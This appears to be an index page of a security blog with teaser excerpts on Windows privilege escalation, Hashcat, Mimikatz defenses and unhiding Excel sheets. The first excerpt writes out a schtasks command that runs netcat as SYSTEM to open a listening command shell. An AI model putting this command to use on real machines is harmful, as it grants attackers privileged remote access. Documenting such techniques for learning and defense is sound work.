Windows from privilege level to SYSTEM

Reading Time: < 1 minuteA classic way to achieve this is via Scheduled Task Copy netcat to c:\temp (for example) schtasks /create /RU SYSTEM /SC weekly /D Sat /TN SysMe /TR “c:\temp\nc.exe -e cmd -l -p 666” /ST 10:00:00 and then run it with Schtasks...


Reading Time: < 1 minute and It’s a tool that let’s you bruteforce hashes. Hashcat 6.0 is the latest version and support around 208 different hash types ! You can use the CPU or the GPU to compute...

Defenses against Mimikatz

Reading Time: < 1 minuteas written in this blogpost mimikatz is an amazing tool to read password from a Window machine (either LSASS process, or Registry keys and other means). How can we defend against it ? Run LSASS process as “RunAsPPL”...

Unhide Excel Sheet tab

Reading Time: < 1 minuteLittle trick a great colleague showed me to unhide a sheet in Excel : In powershell $objExcel = New-Object -ComObject Excel.Application $objExcel.Visible = $true $WorkBook = $objExcel.Workbooks.Open(“C:\Temp\hiddensheet.xls”)...